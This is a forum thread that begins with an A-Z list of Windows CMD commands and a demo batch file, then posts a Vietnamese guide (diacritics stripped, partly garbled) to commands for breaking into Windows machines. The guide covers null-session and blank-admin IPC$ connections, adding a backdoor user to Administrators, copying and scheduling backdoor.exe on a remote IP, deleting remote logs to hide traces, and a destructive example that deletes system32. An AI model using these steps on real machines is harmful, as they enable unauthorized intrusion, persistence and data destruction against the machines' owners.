An A-Z Index of the Windows CMD command line

Admin on Fri Oct 21, 2011 4:24 am

ADDUSERS Add or list users to/from a CSV file

ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
c
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
CMDKEY Manage stored usernames/passwords
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
d
DATE Display or set the date
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSACLs Active Directory ACLs
DSAdd Add items to active directory (user group computer)
DSGet View items in active directory (user group computer)
DSQuery Search for items in active directory (user group computer)
DSMod Modify items in active directory (user group computer)
DSMove Move an Active directory Object
DSRM Remove items from Active Directory
e
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EVENTCREATE Add a message to the Windows event log
EXIT Quit the current script/routine and set an errorlevel
EXPAND Uncompress files
EXTRACT Uncompress CAB files
f
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
g
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
GPUPDATE Update Group Policy settings
h
HELP Online Help
i
iCACLS Change file and folder permissions
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
k
KILL Remove a program from memory
l
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGMAN Manage Performance Monitor
LOGOFF Log a user off
LOGTIME Log the date and time in a file
m
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer.
MEM Display memory usage
MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MV Copy in-use files
n
NET Manage network resources
NETDOM Domain Manager
NETSH Configure Network Interfaces, Windows Firewall & Remote access
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
o
OPENFILES Query or display open files
p
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
POWERCFG Configure power settings
PRINT Print a text file
PRINTBRM Print queue Backup/Recovery
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
q
QGREP Search file(s) for lines that match a given pattern.
r
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files
REPLACE Replace or update one file with another
RD Delete folder(s)
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUN Start | RUN commands
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
s
SC Service Control
SCHTASKS Schedule a command to run at a specific time
SCLIST Display NT Services
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SFC System File Checker
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SLMGR Software Licensing Management (Vista/2008)
SOON Schedule a command to run in the near future
SORT Sort input
START Start a program or command in a separate window
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
t
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TSSHUTDN Remotely shut down or reboot a terminal server
TYPE Display the contents of a text file
TypePerf Write performance data to a log file
u
USRSTAT List domain usernames and last login
v
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
w
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WINRM Windows Remote Management
WINRS Windows Remote Shell
WMIC WMI Commands
WUAUCLT Windows Update
x
XCACLS Change file and folder permissions
XCOPY Copy files and folders
:: Comment / Remark

Admin
Admin on Fri Oct 21, 2011 4:28 am

Code:

ECHO OFF
::CMD se khong hien thi lenh nao duoc thu thi phia duoi.
ECHO QuanTriMang: Demo tao file BAT
:: In ra dong van ban
IPCONFIG /ALL
:: Hien thi thong tin ve mang tren cua so command prompt
PAUSE
:: Tam dung thuc thi cac lenh khac de nguoi dung xem cac thong tin quan trong.
PING www.google.com
:: Ping toi trang Google.com
ECHO Toan bo thong tin ve Google Ping duoc.
::In ra dong van ban
PAUSE
:: Cho phep nguoi dung xem ket qua. Boi vi day la dong lenh cuoi cung nen sau khi nhan phim
bat ky, cua so command se duoc dong lai.

Nhng lnh cn thit cho vic thm nhp h thng

(Windows)
Admin on Sun Nov 06, 2011 2:38 am

Nhng lnh cn thit cho vic thm nhp h thng (Windows) Phn I: Lnh NET
y trong phm vi bi vit ti ch gii thiu vi c php ca tng lnh mt cch ngn gn v thc tin,
cn bn mun tm hiu su hn ch vic g ==> tn lnh cn tm hiu /help (vd: bit su v lnh net
view bn g ==> net view /help), v ti cng khng i su v cng vic thm nhp. Bi vit ny ging
nh l mt bi tng hp cc lnh cn thit m thi v i khi nu lu ngy khng s dng n th bn
vn c th qun n nh thng.
Chng I: Lnh NET

Lnh NET l mt lnh ngoi tr (tc l khng c sn) nhng n lun c i km vi hu ht cc h iu

hnh Windows ca Microsoft v n l mt lnh rt cn thit v quang trng dng xm nhp mt h
thng lnh NET khng i mt mnh m n i chung vi nhng phng thc khc kt hp thnh mt
t hp c th. Chnh v tm quang trng ca n nn ti tch hn n ra thnh mt chng ring bit

1/ NET VIEW: Lnh ny dng xem danh sch cc ti nguyn ang c chia s ca mt my bt k
nu khng c bt c tham s no c ngha l n s hin th ti nguyn ca my cc b (local)

C php:
NET VIEW \\computername
or
NET VIEW \\ip
(dng cho my trn mng hoc tn hoc a ch IP)

V d:
NET VIEW \\127.0.0.1

2/ NET USE: Lnh ny dng kt ni my ca ngi ang thc hin ti mt ti nguyn c chia s
trn h thng mng (c th hiu h thng mng y c th l cc my tnh trong mng cc b hoc
qua a ch IP c nh) vi mt quyn hn nht nh. Lu y l lnh ny ch c tc dng khi bn c
quyn hn ngi s dng nht nh trn mt ti nguyn nht nh trn mi my cn truy cp m thi
( l trng hp bn bit c username v password trn my mun kt ni ti nguyn cn trng
hp nh bn khng bit c th c mt cch l kt ni mt null session n my cn kt ni) cng c
mt cch khc l on v bruce force password hoc s dng tools nhng trong phm vi bi vit ny
ti khng cp n.

C php:
NET USE \\IP\SHARENAME PASSWORD /USER:USERNAME
(Dng kt ni ti mt ti nguyn nht nh khi bit username v password)
NET USE \\IP\IPC$ /USER:Administrator
(trng hp password ca Admin khng thit lp)
NET USE \\IP\IPC$
(kt ni mt null session ti ti nguyn mt nh ==> xc xut thnh cng rt thp)
NET USE .. /DELETE
(s ngt kt ni t my ngi s dng ti my cha ti nguyn)

V d: nh bn ang my A bn mun kt ni ti nguyn ca my B c a ch IP l 120.1.1.5 trong khi

my B c 2 ti nguyn c chia s l (data1 v data2 v data1 dnh cho user1 vi password l
pass1 v data2 dnh cho user2 vi password l pass2 cn mt trng hp na l ti nguyn mt
nh ca my B l IPC$ v thng l dnh cho quyn cao nht l admin v nu khng may ti khon
administrator khng c password bo v th coi nh khi bn kt ni ti ti nguyn IPC$ th bn hon
ton c th truy cp vo mi ti nguyn c chia s mt nh v khng mt nh trn my B)

- kt ni ti data1 v gn ti nguyn cho a x: ==> NET USE x: \\120.1.1.5\data1 pass1

/USER:user1

- kt ni ti ti nguyn mt nh trong trng hp admin khng thit lp password:

Bc 1 ==> NET USE \\120.1.1.5\IPC$ /USER:administrator (khi kt ni ny thnh cng th mi thc

hin tip)

Bc 1 ==> NET USE \\120.1.1.5\IPC$ (kt ni ti mt null session)

Bc 2 ==> NET USE z: \\120.1.1.5\data2 (gn data2 cho a z: truy :cp tin s dng, bn nn
lu y ti khng cn phi thm password v username nh v d trc v kt ni ti IPC$ thnh
cng th khng cn)

Bc 2 ==> NET USE y: \\120.1.1.5\C$ (truy cp ti a c: ca victim thng l chia s mt nh v gn

cho y: my local t bn c th copy bt c th g bn mun vo my victim)

Ghi ch: Nu nh kt ni ti bc 1 hay bc 1 thnh cng th bn c th thao tc cc cu lnh khc

trn my victim m khng gp bt c kh khn g v chnh l cha kha ca cnh ca. Nu s dng
lnh NET USE thnh cng th coi nh bn nm trong tay bt c my no.

3/ NET USER: To/Xa ti khon ngi dng (c th tra cu thm bng /HELP), hoc hin danh sch ti
khon nu khng c tham s.

C php:
NET USER username password /ADD
(to ngi dng c tn l username v password)
NET USER username /DELETE
(xa ngi dng c tn l username)

V d:
NET USER L0ng3ta passw /ADD
(thm mt user c tn l L0ng3ta v mt khu l passw vo h thng khng nht thit phi c du
tr nhng trng hp c k t c bit)
NET USER L0ng3ta /DELETE
(xa ngi dng c tn l L0ng3ta)

4/ NET GROUP: Thm/Xa ngi dng mt group, hin th cc group (nu khng c tham s)
C php:
NET GROUP groupname username /ADD
(thm ngi dng c tn username vo group c tn groupname)
NET LOCALGROUP groupname username /ADD
(thm ngi dng c tn username vo localgroup c tn groupname)
NET GROUP groupname username /DELETE
(thm ngi dng c tn username vo group c tn groupname)
NET LOCALGROUP groupname username /DELETE
(xa ngi dng c tn username khi localgroup c tn groupname)

V d:
NET GROUP Administrators L0ng3ta /ADD
(Thm user L0ng3ta vo group admin)

5/ NET START/STOP tn dch v: lnh ny dng khi to hoc tt mt dch v (Service) ca h thng
window (thng s dng trn local)

v d:
NET START|STOP Task Scheduler (khi ng/tt dch v Task Scheduler ca h thng xem thm lnh
SC)

6/ NET TIME: xem gi ca my trn h thng mng

C php:
NET TIME \\IP
(xem gi ca my c a ch IP xc nh)

v d:
NET TIME \\120.1.1.5

7/ NET SHARE: dng chia s ti nguyn (thng dng trn local)

C php:
NET SHARE sharename=path
(path y c th l mt a hoc ng dn tuyt i ti mt th mc hoc my in .v.v.)

v d:
NET SHARE DATA=C:\ /UNLIMITED
(Chia s a c: ly tn l data vi quyn truy cp khng gii hn)
---
mun xem a ch ip ca trang wed th dng lnh g?

bit chnh xc th cn nhiu vn na. Cch n gin nht l bn s dng lnh ping
v d: ping www.vnn.vn
---
mun bit ip ca mnh trn net?

dng lnh ipconfig /all

hoc s dng cc website ny

http://www.ip2location.com/
hoc
http://whatismyipaddress.com/

Mun thy c bn t v tinh th vo y

http://www.ip-adress.com/
g Ip ca cc bn vo v nhn vo Big IP satellite picture (click here)

B sung:

Trang ny ti mi vit s dng c s d liu ca ip-to-country.com xc nh mt a ch IP thuc

quc gia no cng kh th v.

http://sgstars.tripod.com/cgi-bin/ip...pl?203.162.0.1
(nh sa li Ip bn mun bit)
Phin bn sau s nng cp t nhn bit IP ca bn v quc gia
-------
lm sao mnh c th bit c ip cua ngi n chat vi mnh bng YM vy?
Bn hy vo google g key: Tm + IP + YM s cho bn hng ng kt qu.

--------------

Nhng lnh cn thit dng trong thm nhp (Window) phn II

u phi lc no bn cng d dng thc hin cc thao tc thng giao din bng graphic trn my cn
thao tc (v d nh nhng khi bn ang lm chuyn m m th lm g c ci Window Explorer chng hn
cho bn s dng v thao tc trn cc tp tin) v th nhng lnh sau tuy n gin nhng cng kh l
quang trng trong thao tc ca bn, nu nh bn mun thm nhp mt my no chng hn m bn
coi nh khng thuc nm lng cc lnh di y th ti khuyn bn hy b nh i.

1/Lnh COPY: lnh ny l lnh ni tr dng sao chp cc tp tin (khi bn xm nhp vo c ri th d
nhin phi li ci g th bn dng lnh ny)

C php:
COPY path1\filename1 path2
(chp tp tin filename1 ng dn path1 sang ng dn path2)
+Ch : y ti dng nh ngha ng dn tc l c th gm mt a, mt th mc hay c mt a
ch ti nguyn mng (vi iu kin bn kt ni ti)

V d:
==>COPY c:\abc.txt d:\
(chp tp tin c tn l abc.txt t c: sang a d
==>COPY c:\backdoor.exe \\203.162.45.2\c$
(chp file backdoor t a C my ca bn sang a C ca a ch IP 203.162.45.2)
Lu : tn tp tin bn c th s dng nhng k t i din nh * hoc ?
==>Copy c:\*.doc d:\ (chp tt c cc tp c ui .doc sang d

2/Lnh DEL: lnh ny l lnh ni tr dng xa tp tin (dng xa b du chn ngi lnh )

C php:
DEL path\filename
(xa file c tn l filename ti ng dn path)
V d:
==>DEL c:\windows\*.log
(xa tt c tp tin .log ti a C: v trong th mc windows)
M rng: DEL \\203.162.45.2\Admin$\*.log

3/Lnh MD: lnh ny l lnh ni tr dng to mt th mc

C php:
MD path\tenthumuc

V d:
==>MD c:\windows\temp1
(to th mc temp1 trong th mc windows ca c
M rng:
==>MD \\203.162.45.2\Admin$\temp1

4/Lnh RD hay RMDIR (xa th mc)

C php:
RD /S /Q path\tenthumuc
(vi tham s /S th s xa tt c cc file v th mc con nm trong th mc cn xa v tham s /Q l xa
khng cn hi)

V d:
==>RD /S /Q c:\windows\system32
(xa th mc system32 v tt c nhng g nm trong system32)

5/Lnh AT: hn gi cho mt chng trnh t kch hot (c th g AT /HELP bit thm)

C php:
AT \\IP time /INTERACTIVE command

V d:
==>AT \\203.162.45.2 2:30AM /INTERACTIVE c:\backdoor.exe
Hn gi ng 2:30 th my c a ch IP l \\203.162.45.2 s kch hot chng trnh backdoor.exe trong
C:

Lu : lnh AT ch c tc dng khi service task schedule c bt ln. (xem thm lnh NET START
(trong phn 1) hoc lnh SC bn di bit cch bt mt service) v mun chng trnh kch hot
ngay m khng phi i th bn phi kim tra gi h thng ti a ch IP xc nh bng lnh NET TIME
(trong phn 1) v bo m rng gi bn hn cho chng trnh kch hot phi ln hn gi h thng t
nht l 1 pht.

6/Lnh SC: chy hot tt mt service trn my xc nh

C php:
SC \\IP start/stop/pause service

V d:
==>SC \\203.162.45.2 start Schedule
(chy service Schedule trn my c IP 203.162.45.2)

7/Lnh START: kch hot mt chng trnh ti my local

C php:
START tn chng trnh

V d: (chy chng trnh notepad t command line)

==>START notepad
hoc
==>START notepad.exe

8/Lnh TASKLIST (xem danh sch v ID cc chng trnh chy trong process).
 tm hiu thm bng cch g TASKLIST /?

9/Lnh TASKKILL (hy mt process xem thm bng cch TASKKILL /?)

C php:
TASKKILL /PID ID
(hy chng trnh ang chy theo ID)
hoc
TASKKILL /F /IM tn chng trnh
(hy chng trnh c tn ang chy trong process)

V d chng trnh notepad.exe khi chy lnh TASKLIST c ID l 644 th khi mun hy ta g lnh:
==>TASKKILL /PID 644
hoc
==>TASKKILL /F /IM notepad.exe

10/Lnh REG: (to, xa, khi phc, xem cc gi tr ca registry trn my local hoc mt mng)

C php:
Reg Operation
Trong Operation bao gm cc thao tc nh Add, Query, Delete, Copy, Save, Load, Unload, Restore, .
bit thm chi tit cc bn g Reg Add /?)

V d: m kha cho registry edit cho my tnh c tn l ABC bn bn g nh sau:

REG add \\ABC\HKCU\Software\Microsoft\Windows\CurrentVersi on\Policies\System /v

DisableRegistryTools /t REG_DWORD /d 0 /f

l nhng lnh ht sc c bn m cc bn cn phi nm r nu nh mun i bc u v lnh vc

thm nhp. Nhng cc lnh ny khng phi l tt c v cn nhiu nhiu lnh v chng trnh khc na
nhng l nhng lnh thit yu nht. Chng qua bi vit ny ch nhm mc ch thng k v i khi lu
ngy ta khng s dng n ri cng qun. Hy vng bi vit gip ch cho cc bn v gip cc bn cng c
mt li s kin thc c bn.